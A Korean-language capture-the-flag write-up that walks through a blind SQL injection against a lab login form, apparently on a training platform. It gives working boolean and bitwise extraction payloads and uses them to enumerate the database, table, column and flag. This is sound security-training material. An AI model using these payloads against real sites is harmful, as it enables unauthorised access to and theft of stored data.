[SegFault] (SQLi) - SQL Injection 6

[SegFault] (SQLi)

SQL Injection 6

Flag Find

문제 파악

위의 페이지에 들어가면 아래과 같은 창이 나온다.

우선 주어진 계정 정보로 로그인 해보자.

계정 정보 : normaltic / 1234

 

로그인 하면 다음과 같은 페이지로 넘어간다.

로그인 후에 봤을때 딱히 입력 부분이 보이지 않는다.

그렇다면 로그인 창에서 SQL Injection이 가능한지 확인해보자.

 

SQL Injection 가능 여부

'and'1'='1 을 넣어준 상태로도 정상 동작하는지 확인한다.

normaltic'and'1'='1 / 1234

위의 id / pw로도 로그인 되는지 확인한 결과 정상적으로 로그인되는 것을 확인했다.

본 문제의 경우 에러 메시지가 노출되는 것도 아니었고, 잘못된 입력의 경우에 한하여 Incorrect Information이라는 알림이 나올 뿐이었다.

이런 경우에는 Blind SQL Injection 진행 절차(Process)에 따라 진행한다.

---

풀이 과정 (해결 방안)

1. SQL Injection Point 찾기

Blind SQL Injection의 경우, 참과 거짓의 결과가 둘다 찾아져야하고, 서로 달라야한다.

즉, 참은 참이라는 결과가, 거짓은 거짓이라는 결과가 각각 나와야한다는 것이다.

위에서 참인 값에 대하여는 확인하였지만 Burp로 다시 확인해본다.

normaltic'and'1'='1 / 1234

위와 같이 입력하고 Incorrect를 검색한 결과 0 matches 가 나온다.

거짓인 값에 대하여는 'and'1'='2와 같이 거짓인 값을 붙여 넣우주고 확인한다.

normaltic' and '1'='2

거짓에 대한 결과로 다음과 같은 경고 메시지가 뜨는 것을 확인할 수 있었다.

Burp 로 확인해보면 다음과 같다.

Incorrect를 검색하는 결과 거짓인 값이므로 Incorrect Information이 검색되는 것을 확인할 수 있었다.

 

2. SELECT 문구가 가능한지 확인하기

normaltic' and ((select 'test') = 'test') and '1'='1

위와 같은 구문을 이용하여 해당 값이 참인지 확인하여 SELECT 문을 삽입해도 문제가 없는지 확인한다.

성공적으로 로그인되므로 SELECT문이 삽입 가능한 것을 확인할 수 있었다.

 

3. 공격 Format 작성하기

Blind SQL Injection의 공격 Format은 2가지 방식을 생각해 볼 수 있다.

이진 탐색 기반

normaltic' and (ascii(substr((__SQL__),문자 위치,1)) > ASCII 값) and '1'='1

ASCII 값 자체를 넣어서 비교한다.

논리 연산 기반

normaltic' and ascii(substr((__SQL__,문자 위치,1))&n=n#

논리 연산을 통해 n = 1, 2, 4, 8, 16, 32, 64 에 대한 값(이진 값)을 각각 확인하고 참인 값에 대한 합의 결과를 도출한다.

본 문제에서는 논리연산 방식을 이용할 것이다.

(문자 위치는 1부터)

 

4. DB 이름 확인하기

1,2,16,32,64 = 115 → s

1,16,32,64 = 113 → q

4,8,32,64 = 108 → l

1,8,32,64 = 105 → i

1,2,4,8,16,64 = 95 → _

1,2,16,32 = 51 → 3

0 → NULL

DB의 이름은 sqli_3 로 확인되었다.

 

5. Table 이름 확인하기

TABLE 이름을 확인하기 위한 쿼리는 다음과 같다.

select table_name from information_schema.tables where table_schema = 'sqli_3' limit 0,1

위의 쿼리를 공격 Format에 담아 확인해본다.

normaltic' and ascii(substr((select table_name from information_schema.tables where table_schema = 'sqli_3' limit 0,1),1,1))&1=1#

여기부터는 노가다에 가까우므로 간략화 하여 결과만 작성하려 한다. 추후에 python 자동화 코드를 이용한 방식으로 추가적으로 정리하도록 할 것이다.

102 / 108 / 97 / 103 / 95 / 116 / 97 / 98 / 108 / 101 / 0
flag_table

 

6. Column 이름 확인하기

COLUMN 이름을 확인하기 위한 쿼리는 다음과 같다.

select column_name from information_schema.columns where table_name = 'flag_table' limit 0,1

위의 쿼리를 공격 Format에 담아 확인해본다.

normaltic' and ascii(substr((select column_name from information_schema.columns where table_name = 'flag_table' limit 0,1),1,1))&1=1#

그 결과는 다음과 같다.

102 / 108 / 97 / 103 / 0
flag

 

7. Data 찾기

DATA 이름 확인을 위한 쿼리는 다음과 같다.

select flag from flag_table limit 0,1

115 / 101 / 103 / 102 / 97 / 117 / 108 / 116 / 123 / 66 / 108 / 105 / 110 / 100 / 95 / 83 / 81 / 76 / 105 / 95 / 69 / 65 / 83 / 89 / 125 / 0 
segfault{_______________}

위의 결과 취합을 통해 flag 획득에 성공하였다.

결과적으로 Blind SQLi 를 통해 flag 획득에 성공하였다.

---

생각해볼 점

Union SQLi 와 Error Based SQLi의 경우 화면에 해당 값이 노출되어 확인이 가능하다.

하지만 Blind SQLi의 경우 참 / 거짓을 통하여 값을 확인할 수는 있지만, 실제로 노출되어 있는 것이 아니기 때문에 노가다성이 짙다. 그러므로 더더욱 python을 이용한 자동화의 필요성을 느끼게 된다.

python을 이용한 자동화 코드를 작성 해보고 정리하도록 해야겠다.

---

질문 환영, 수정 및 보완에 대한 지적 환영